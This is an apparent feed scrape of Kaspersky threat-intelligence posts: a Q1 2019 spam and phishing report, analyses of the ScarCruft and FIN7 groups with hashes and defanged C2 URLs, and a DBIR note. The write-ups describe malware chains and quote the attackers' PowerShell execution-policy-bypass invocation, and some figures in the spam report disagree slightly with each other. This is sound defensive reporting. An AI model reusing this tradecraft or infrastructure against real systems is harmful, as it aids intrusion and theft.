Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 2 óra 7 perc
2019. május 15.

Spam and phishing in Q1 2019

Quarterly highlights Valentine’s Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.

New Apple products

Late March saw the unveiling of Apple’s latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Growth in the number of attempts to redirect users to phishing Apple sites before the presentation (download)

Fake Apple ID login pages

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.

Fake “Kaspersky Lab support service” accounts

All these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.

New Instagram “features”

Last year, we wrote that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.

As usual in such schemes, the “buyer” is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.

Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

“Dream job” offers from spammers

In Q3, we registered spam messages containing “dream job” offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the “cloud service,” the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim’s machine.

Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of “sextortion” — a topic we wrote about last year.

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim’s details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “employee” happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

Playing on people’s fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

Malicious attacks on the corporate sector

In Q1, the corporate sector of the Runet was hit by a malicious spam attack. The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

We also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender’s address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message — for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

Statistics: spam Proportion of spam in mail traffic

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in global mail traffic, Q4 2018 – Q1 2019 (download) (download)

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019 (download) (download)

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

Sources of spam by country

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of spam by country, Q1 2019 (download) (download)

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).

Spam email size

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Spam email size, Q4 2018 – Q1 2019 (download) (download)

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

Malicious attachments: malware families

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

TOP 10 malicious families in mail traffic, Q1 2019 (download) (download)

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

Countries targeted by malicious mailshots

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries targeted by malicious mailshots, Q1 2019 (download) (download)

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented 111,832,308 attempts to direct users to scam websites. 12.11% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of phishing attacks, Q1 2019 (download) (download)

In second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

Country %* Brazil 21.66 Australia 17.20 Spain 16.96 Portugal 16.81 Venezuela 16.72 Greece 15.86 Albania 15.11 Ecuador 14.99 Rwanda 14.89 Georgia 14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 27.78%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of organizations subjected to phishing attacks by category, Q1 2019 (download) (download)

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).


In Q1 2019, the average share of spam in global mail traffic rose by 0.06 p.p. to 55.97%, and the Anti-Phishing system prevented more than 111,832,308 redirects to phishing sites, up 35,220,650 in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

2019. május 13.

ScarCruft continues to evolve, introduces Bluetooth harvester

Executive summary

After publishing our initial series of blogposts back in 2016, we have continued to track the ScarCruft threat actor. ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula. The threat actor is highly skilled and, by all appearances, quite resourceful.

We recently discovered some interesting telemetry on this actor, and decided to dig deeper into ScarCruft’s recent activity. This shows that the actor is still very active and constantly trying to elaborate its attack tools. Based on our telemetry, we can reassemble ScarCruft’s binary infection procedure. It used a multi-stage binary infection to update each module effectively and evade detection. In addition, we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel.

Multi-stage binary infection

The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises (SWC). As in Operation Daybreak, this actor performs sophisticated attacks using a zero-day exploit. However, sometimes using public exploit code is quicker and more effective for malware authors. We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign.

In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.

Multi-stage binary infection

The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service, it uses predefined directory path such as /english, /video or /scriptout.

Cloud-based backdoor

The same malware contains full-featured backdoor functionality. The commands are downloaded from the /script path of a cloud service provider and the respective execution results are uploaded to the /scriptout path. It supports the following commands, which are enough to fully control the infected host:

  • Get File/Process listing
  • Download additional payload and execute
  • Execute Windows command
  • Update configuration data including cloud service token information
  • Save screenshot and an audio recording

The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration. During our research, we confirmed that they have an interest in mobile devices.

We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information.

  • Instance Name: Name of device
  • Address: Address of device
  • Class: Class of the device
  • Connected: Whether the device is connected(true or false)
  • Authenticated: Whether the device is authenticated(true or false)
  • Remembered: Whether the device is a remembered device(true or false)

The attackers appear to be increasing the scope of the information collected from victims.

Build path of Bluetooth information harvester


We have found several victims of this campaign, based on our telemetry – investment and trading companies in Vietnam and Russia. We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea. It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.

Victimology of this campaign

Overlap with other actors

We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past. The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs. ScarCruft infected this victim on September 21, 2018. But before the ScarCruft infection, however, another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018.

GreezeBackdoor is a tool of the DarkHotel APT group, which we have previously written about. In addition, this victim was also attacked by the Konni malware on 03 April 2018. The Konni malware was disguised as a North Korean news item in a weaponized documents (the name of the document was “Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip”)

Infection timeline

This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors. Members from our team have already presented on the conflict of these two threat actors at security conferences. We have also shared more details with our threat intelligence customers in the past. They are both Korean-speaking threat actors and sometimes their victimology overlaps. But both group seem to have different TTPs (Tactics, Techniques and Procedures) and it leads us to believe that one group regularly lurks in the other’s shadow.


The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve. For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise File hashes (malicious documents, Trojans, emails, decoys)

ScarCruft tools

  • 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester
  • C781f5fad9b47232b3606e4d374900cd Installer
  • 032ed0cd234f73865d55103bf4ceaa22 Downloader
  • 22aaf617a86e026424edb7c868742495 AV Remover
  • 07d2200f5c2d03845adb5b20841faa94 AV Remover
  • 1f5ac2f1744ed9c3fd01fe72ee8d334f Initial Dropper
  • 4d20f7311f4f617104f559a04afd2fbf Installer
  • 03e5e566c1153cb1d18b8bc7c493025f Downloader
  • C66ef71830341bb99d30964a8089a1fc Loader
  • 5999e01b83aa1cc12a2ad6a0c0dc27c3 Installer
  • 4d3c34a3070643c225be1dbbb3457ad4 Injector
  • 0790F1D7A1B9432AA5B8590286EB8B95 Downloader
  • 04371bf88b598b56691b0ad9da08204b Installer
  • e8b23cfc805353f55ed67cf0af58f305 UAC bypass(UACME)
  • 5380a173757e67d9b12f316771012768 Installer
  • Ec0e77b57cb9dd7a04ab6e453810937c Downloader
  • 25701492a18854ffdb05317ec7d19c29 Installer
  • 172b4dc27e41e4a0c84a803b0b944d3e UAC bypass(UACME)
  • 7149c205d634c4d17dae33fffb8a68ab Image file embedded ROKRAT
  • A76c4a79e6ff73bfd7149a49852e8916 ROKRAT
  • F63fc2d11fcebd37be3891def5776f6c Dropper
  • 899e90a0851649a5c270d1f78baf60f2 Simple HTTP Downloader
  • E88f7f285163d0c080c8d3e525b35ab3 Simple HTTP Downloader
  • D7c94c5ba028dc22a570f660b8dee5b9 Simple HTTP Downloader
  • A6bd2cf7bccf552febb8e8347d07529a Simple HTTP Downloader
  • 7a338d08226f5a38353385c8a5dec746 Simple HTTP Downloader
  • 46F66D2D990660661D00F5177306309C Simple HTTP Uploader

GreezaBackdoor of DarkHotel

  • 5e0e11bca0e94914e565c1dcc1ee6860


  • 4c2016df6b546326d67ac2a79dea1343
  • http://34.13.42[.]35/uploads/1.jpg
  • http://34.13.42[.]35/uploads/2.jpg
  • http://34.13.42[.]35/uploads/qwerty.jpg
  • http://34.13.42[.]35/uploads/girl.jpg
  • http://34.13.42[.]35/uploads/girllisten.jpg
  • https://34.13.42[.]35/uploads/newmode.php
  • http://acddesigns.com[.]au/demo/red/images/slider-pic-6.jpg
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/images.png
  • http://www.stjohns-burscough[.]org/uploads/images.png
  • http://lotusprintgroup[.]com/images.png
  • https://planar-progress.000webhostapp[.]com/UserFiles/File/image/image/girl.jpg
  • https://planar-progress.000webhostapp[.]com/userfiles/file/sliderpic.jpg
  • http://www.jnts1532[.]cn/phpcms/templates/default/message/bottom.jpg
  • http://www.rhooters[.]com/bbs/data/m_photo/bottom.jpg
  • https://buttyfly.000webhostapp[.]com/userfiles/file/sliderpic.jpg
Domains and IPs
  • buttyfly.000webhostapp[.]com
  • planar-progress.000webhostapp[.]com
  • 120.192.73[.]202
  • 180.182.52[.]76
2019. május 8.

The 2019 DBIR Is Out

Once again, we are happy to support a large, voluntary, collaborative effort like the 2019 Data Breach Investigations Report. While our data contribution is completely anonymous, it is based in some of the 2018 data set that our private report customers receive from our efforts to protect all of our customers against every type of malware threat regardless of its source.

In general, the report is an excellent point of reference because it is sourced from so many organizations handling various incidents. This year, the Public Administration sector tops the list by far in terms of reported incidents and data along with the Information sector. “Cyber-Espionage is rampant in the Public sector, with State-affiliated actors accounting for 79 percent of all breaches involving external actors” and “Web applications are targeted with availability attacks as well as leveraged for access to cloud-based organizational email accounts.” Small businesses made up 43% of the reported DBIR breach victims in 2018.

“Use 2FA” is a common refrain throughout the report, along with “squish the phish”. Both two factor authentication and phishing awareness, training, and handling can go a long ways toward improving security in all organizations.

Enjoy another fine read this year!

2019. május 8.

FIN7.5: the infamous cybercrime rig “FIN7” continues its activities

On August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.

In 2018-2019, researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.

Recent FIN7 campaigns

The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.

Malicious Documents

We have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE[1] feature of Microsoft Word to get context information about the victim’s computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as “12345”, “1234”, etc., uses macros to execute a GRIFFON implant on the target’s computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.

Interestingly, following some open-source publications about them, the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows these to modify different IOCs, such as the filenames of wscript.exe or sctasks.exe copies, etc.

wscript.exe copy sctasks copy Task name C2 byzNne10.exe byzNne17.exe TaskbyzNne logitech-cdn.com c9FGG10.exe c9FGG17.exe Taskc9FGG logitech-cdn.com zEsb10.exe zEsb17.exe TaskzEsb servicebing-cdn.com

IOCs extracted from docs which use sctasks for GRIFFON persistence

Author Company wscript.exe copy C2 mogjxjtvte mogjxjtvte mswmex44.exe logitech-cdn[.]com soxvremvge soxvremvge c9FGG10.exe logitech-cdn[.]com gareljtjhvd gareljtjhvd zEsb10.exe servicebing-cdn[.]com

IOCs extracted from regular documents associated to GRIFFON


Griffon Malware attack pattern

The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.

Reconnaissance module

The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors.

Meterpreter downloader

The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet“. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute.

Screenshot module

The third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at “%TMP%/image.png”, sent back to the attackers by the GRIFFON implant and then deleted.

Persistence module

The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method.

Through its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation.

On the hunt for GRIFFON infrastructure

Attackers make mistakes, and FIN7 are no exception. The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirection to various Google services on their C2s servers.

HTTP/1.1 302 Found Server: nginx Date: [retracted] Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Location: https://cloud.google.com/cdn/

Returned headers for most of the GRIFFON C2s servers on port 443

This error allowed us to follow the infrastructure week by week, until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking against their infrastructure.

Fake pentest company

During the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.

According to the website, that domain supposedly belongs to a legitimate security company “fully owned by the Russian Government” (sic.) and having offices in “Moscow, Saint Petersburg and Yekaterinburg”, but the address says the company is located in Trump Tower, in New York. Given FIN7’s previous use of false security companies, we decided to look deeper into this one.

As we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:

  • DKSec – www.dksec.com
  • OKIOK – www.okiok.com/services/tailored-solutions
  • MainNerve – www.mainnerve.com
  • Datics – www.datatics.com/cyber-security
  • Perspective Risk – www.perspectiverisk.com
  • Synack – https://www.synack.com/company
  • FireEye – https://www.fireeye.com/services/penetration-testing.html

This company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.

In addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.

Links to other intrusion sets

While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.


In his history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.

FIN7’s last campaigns were targeting banks in Europe and Central America. This threat actor stole suspected of stealing €13 million from Bank of Valetta, Malta earlier this year.

Example of malicious documents used in the end of 2018 to beginning of 2019

A few interesting overlaps in recent FIN7 campaigns:

  • Both used macros to copy wscript.exe to another file, which began with “ms” (mses.exe – FIN7, msutil.exe – EmpireMonkey).
  • Both executed a JScript file named “error” in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).
  • Both used DocuSign decoy documents with different macros. The macros popped the same “Document decryption error” error message—even if macro code remain totally different.

We have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.


AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.

To deliver their malware, the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. What is interesting, in some emails, they ask targets to phone them if they have any questions, like the FIN7 guys do.

Example of AveMaria spearphing emails. Criminals suggest calling them.

During the investigation into FIN7, our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria. Basically, two servers in the same IP range and AS14576 (autonomous system) share a non-standard SSH port, which is 222. One of the servers is a Griffon C2, and the other one, an AveMaria C2.

Distribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.


At the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called “CopyPaste” from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center.

This set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim’s networks and avoid detection.

Here are the main similarities between CopyPaste and FIN7:

  • Both used the same Microsoft PowerShell argument obfuscation order: “powershell.exe -NoP -NonI -ExecutionPolicy Bypass”. We have only seen FIN7 and CopyPaste use this argument list for executing their malicious Powershell Scripts.
  • Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digitcert and Microsoft websites and used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too, FIN7 on its GRIFFON C2s before January 2018, and Cobalt, on its staging servers, similar to CopyPaste.
